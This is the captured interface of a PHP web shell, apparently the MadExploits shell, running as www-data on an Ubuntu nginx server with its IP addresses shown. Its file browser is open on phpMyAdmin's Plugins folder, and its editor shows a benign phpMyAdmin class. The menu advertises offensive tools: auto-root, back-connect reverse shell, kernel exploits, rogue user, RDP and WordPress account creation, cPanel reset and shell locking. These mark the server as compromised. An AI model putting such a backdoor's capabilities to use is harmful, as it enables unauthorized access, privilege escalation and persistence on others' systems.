Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
phpmyadmin /
libraries /
classes /
Plugins /
[ HOME SHELL ]
Name
Size
Permission
Action
Auth
[ DIR ]
drwxr-xr-x
Export
[ DIR ]
drwxr-xr-x
Import
[ DIR ]
drwxr-xr-x
Schema
[ DIR ]
drwxr-xr-x
Transformations
[ DIR ]
drwxr-xr-x
TwoFactor
[ DIR ]
drwxr-xr-x
AuthenticationPlugin.php
9.87
KB
-rw-r--r--
ExportPlugin.php
11.29
KB
-rw-r--r--
IOTransformationsPlugin.php
2.29
KB
-rw-r--r--
ImportPlugin.php
1.91
KB
-rw-r--r--
SchemaPlugin.php
2.17
KB
-rw-r--r--
TransformationsInterface.php
791
B
-rw-r--r--
TransformationsPlugin.php
1.64
KB
-rw-r--r--
TwoFactorPlugin.php
3.77
KB
-rw-r--r--
UploadInterface.php
557
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : IOTransformationsPlugin.php
<?php /** * Abstract class for the I/O transformations plugins */ declare(strict_types=1); namespace PhpMyAdmin\Plugins; /** * Provides a common interface that will have to be implemented * by all of the Input/Output transformations plugins. */ abstract class IOTransformationsPlugin extends TransformationsPlugin { /** * Specifies whether transformation was successful or not. * * @var bool */ protected $success = true; /** * To store the error message in case of failed transformations. * * @var string */ protected $error = ''; /** * Returns the html for input field to override default textarea. * Note: Return empty string if default textarea is required. * * @param array $column column details * @param int $row_id row number * @param string $column_name_appendix the name attribute * @param array $options transformation options * @param string $value Current field value * @param string $text_dir text direction * @param int $tabindex tab index * @param int $tabindex_for_value offset for the values tabindex * @param int $idindex id index * * @return string the html for input field */ public function getInputHtml( array $column, $row_id, $column_name_appendix, array $options, $value, $text_dir, $tabindex, $tabindex_for_value, $idindex ) { return ''; } /** * Returns the array of scripts (filename) required for plugin * initialization and handling * * @return array javascripts to be included */ public function getScripts() { return []; } /** * Returns the error message * * @return string error */ public function getError() { return $this->error; } /** * Returns the success status * * @return bool */ public function isSuccess() { return $this->success; } /** * Resets the object properties * * @return void */ public function reset() { $this->success = true; $this->error = ''; } }
Close